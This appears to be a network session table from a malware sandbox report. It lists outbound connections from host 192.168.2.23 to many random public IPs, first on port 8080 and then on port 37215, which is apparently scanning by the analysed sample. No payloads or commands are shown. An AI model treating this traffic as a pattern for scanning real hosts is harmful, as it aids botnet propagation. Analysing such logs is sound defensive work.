                                                        32526192.168.2.235896654.160.193.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32527192.168.2.2340988212.166.135.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32528192.168.2.2342396173.249.252.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32529192.168.2.235815879.155.109.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32530192.168.2.235749889.62.215.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32531192.168.2.2345524173.71.93.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32532192.168.2.235801670.189.64.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32533192.168.2.2357620110.198.219.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32534192.168.2.2347262198.234.154.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32535192.168.2.2350884139.79.56.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32536192.168.2.2350854202.213.239.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32537192.168.2.2339026212.175.47.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32538192.168.2.2349822168.13.244.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32539192.168.2.235244437.226.114.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32540192.168.2.2333776163.201.29.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32541192.168.2.235179831.102.191.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32542192.168.2.235891050.135.65.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32543192.168.2.2342084182.64.126.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32544192.168.2.2335114191.251.124.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32545192.168.2.2347356223.128.90.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32546192.168.2.2333348174.115.122.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32547192.168.2.235961874.249.39.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32548192.168.2.23374048.225.59.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32549192.168.2.2334006136.2.67.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32550192.168.2.2355504201.14.162.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32551192.168.2.234741093.75.126.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32552192.168.2.234212648.12.93.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32553192.168.2.23401869.198.77.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32554192.168.2.233906619.84.38.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32555192.168.2.2355604191.255.113.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32556192.168.2.2343734142.243.208.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32557192.168.2.2341684115.187.176.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32558192.168.2.234907024.35.54.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32559192.168.2.2347800125.252.125.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32560192.168.2.2351812102.91.139.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32561192.168.2.235875887.171.53.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32562192.168.2.234118483.124.76.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32563192.168.2.2356324211.250.22.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32564192.168.2.23579305.131.204.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32565192.168.2.2338042219.77.175.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32566192.168.2.2355086103.91.57.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32567192.168.2.2342216137.25.94.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32568192.168.2.2353926109.232.175.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32569192.168.2.236088068.62.180.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32570192.168.2.2355480131.192.196.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32571192.168.2.2340310194.207.225.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32572192.168.2.2342124220.40.212.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32573192.168.2.23486601.224.37.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32574192.168.2.233427468.156.8.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32575192.168.2.235184491.187.157.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32576192.168.2.2338406106.223.108.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32577192.168.2.2337458121.228.66.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32578192.168.2.234615296.11.28.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32579192.168.2.2354424105.245.84.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32580192.168.2.2333572216.99.77.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32581192.168.2.2356942132.157.129.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32582192.168.2.2340816116.89.228.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32583192.168.2.2349150119.42.108.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32584192.168.2.23609461.212.237.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32585192.168.2.2341186193.86.116.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32586192.168.2.234311292.169.197.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32587192.168.2.2350794207.132.136.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32588192.168.2.2353120182.68.43.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32589192.168.2.2341878135.13.114.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32590192.168.2.233627040.249.42.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32591192.168.2.2351434216.236.91.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32592192.168.2.2343458210.16.135.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32593192.168.2.2335422166.37.232.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32594192.168.2.2350222123.230.177.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32595192.168.2.2352846156.50.28.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32596192.168.2.2351474201.196.185.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32597192.168.2.234655049.198.66.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32598192.168.2.233868894.252.6.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32599192.168.2.2344982103.114.189.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32600192.168.2.2341492185.26.118.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32601192.168.2.2335030102.182.186.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32602192.168.2.2349308123.59.251.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32603192.168.2.2336912175.52.51.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32604192.168.2.2340414115.108.23.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32605192.168.2.235948060.242.189.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32606192.168.2.2358156173.212.43.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32607192.168.2.2352232204.157.240.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32608192.168.2.2339248130.47.15.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32609192.168.2.2337862190.69.190.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32610192.168.2.234328660.172.246.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32611192.168.2.234181424.4.74.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32612192.168.2.234795657.82.201.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32613192.168.2.236095858.14.170.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32614192.168.2.234250699.206.45.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32615192.168.2.23582042.244.88.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32616192.168.2.2336774196.135.178.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32617192.168.2.2347152156.73.82.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32618192.168.2.2344648123.251.7.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32619192.168.2.2340360158.34.243.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32620192.168.2.235380838.72.84.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32621192.168.2.234562075.46.8.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32622192.168.2.2345172146.20.64.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32623192.168.2.2344632109.29.72.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32624192.168.2.2347918166.171.135.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32625192.168.2.2351944104.213.141.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32626192.168.2.2343080202.120.203.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32627192.168.2.2358546124.28.65.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32628192.168.2.2346286104.188.221.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32629192.168.2.235877884.97.239.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32630192.168.2.235406873.220.128.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32631192.168.2.2353028177.148.186.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32632192.168.2.233680632.35.240.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32633192.168.2.2353652134.107.130.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32634192.168.2.2357632217.143.130.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32635192.168.2.235076848.135.97.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32636192.168.2.234144051.168.50.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32637192.168.2.2340128154.210.77.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32638192.168.2.2355354144.242.232.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32639192.168.2.2349608187.37.46.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32640192.168.2.235061297.201.166.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32641192.168.2.235318069.83.228.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32642192.168.2.2347714129.148.31.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32643192.168.2.235016692.74.214.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32644192.168.2.23538385.110.168.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32645192.168.2.235894066.164.244.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32646192.168.2.2357722124.72.85.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32647192.168.2.234824676.21.150.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32648192.168.2.2352866158.65.241.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32649192.168.2.235204285.196.18.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32650192.168.2.2350212200.90.169.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32651192.168.2.233707494.34.27.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32652192.168.2.2347120186.243.0.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32653192.168.2.233512813.209.24.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32654192.168.2.2348740139.62.134.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32655192.168.2.235776068.90.74.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32656192.168.2.2336780219.82.198.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32657192.168.2.234945484.77.190.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32658192.168.2.2347256130.115.110.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32659192.168.2.233393434.147.31.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32660192.168.2.2348202100.134.148.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32661192.168.2.235116223.40.215.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32662192.168.2.23516609.67.31.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32663192.168.2.2356474156.187.243.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32664192.168.2.2346044192.64.167.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32665192.168.2.2353130115.15.220.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32666192.168.2.233775853.229.193.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32667192.168.2.2345894196.55.65.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32668192.168.2.234593041.91.184.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32669192.168.2.233510441.198.218.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32670192.168.2.2352072197.110.9.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32671192.168.2.2339174157.75.120.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32672192.168.2.2340522103.102.51.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32673192.168.2.2347414197.253.233.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32674192.168.2.234271858.179.100.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32675192.168.2.2352758197.209.242.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32676192.168.2.2341946197.90.215.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32677192.168.2.235495041.157.60.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32678192.168.2.235909071.163.117.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32679192.168.2.234674241.24.94.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32680192.168.2.2342888197.219.5.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32681192.168.2.234804837.161.51.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32682192.168.2.235603036.233.35.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32683192.168.2.234563635.0.204.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32684192.168.2.2345934197.43.170.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32685192.168.2.236036841.102.32.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32686192.168.2.2348290197.209.147.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32687192.168.2.2339404197.1.227.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32688192.168.2.2337084197.9.209.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32689192.168.2.2335186124.225.177.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32690192.168.2.235817879.240.210.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32691192.168.2.2357022197.243.237.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32692192.168.2.2355914157.248.121.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32693192.168.2.2358234197.243.46.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32694192.168.2.235489441.229.187.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32695192.168.2.2339262197.174.199.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32696192.168.2.2353878157.79.200.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32697192.168.2.235457841.133.173.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32698192.168.2.2350886157.209.181.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32699192.168.2.2346016197.232.75.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32700192.168.2.2350280182.168.114.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32701192.168.2.2359638197.90.84.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32702192.168.2.2346798157.98.17.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32703192.168.2.235729041.80.191.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32704192.168.2.2344892197.69.237.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32705192.168.2.2344198124.229.230.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32706192.168.2.2348894157.99.14.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32707192.168.2.235424441.250.32.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32708192.168.2.2340444197.79.28.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32709192.168.2.2341496152.1.243.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32710192.168.2.2352514157.149.189.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32711192.168.2.2336174197.210.5.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32712192.168.2.2340996157.127.159.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32713192.168.2.235535641.79.54.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32714192.168.2.2340050217.124.208.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32715192.168.2.235010427.113.138.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32716192.168.2.233901841.128.13.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32717192.168.2.233447276.123.81.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32718192.168.2.2346490129.21.93.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32719192.168.2.233362441.211.15.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32720192.168.2.234810241.35.57.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32721192.168.2.2341324197.189.193.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32722192.168.2.235869041.128.211.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32723192.168.2.233314841.178.0.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32724192.168.2.2356964197.37.92.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32725192.168.2.234112413.28.227.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32726192.168.2.234406641.137.253.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32727192.168.2.234899441.211.115.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32728192.168.2.2339396157.235.204.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32729192.168.2.234650099.184.246.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32730192.168.2.233298241.160.136.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32731192.168.2.234942041.77.11.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32732192.168.2.234715841.83.57.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32733192.168.2.234153441.164.178.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32734192.168.2.2339094197.136.15.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32735192.168.2.234421441.151.190.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
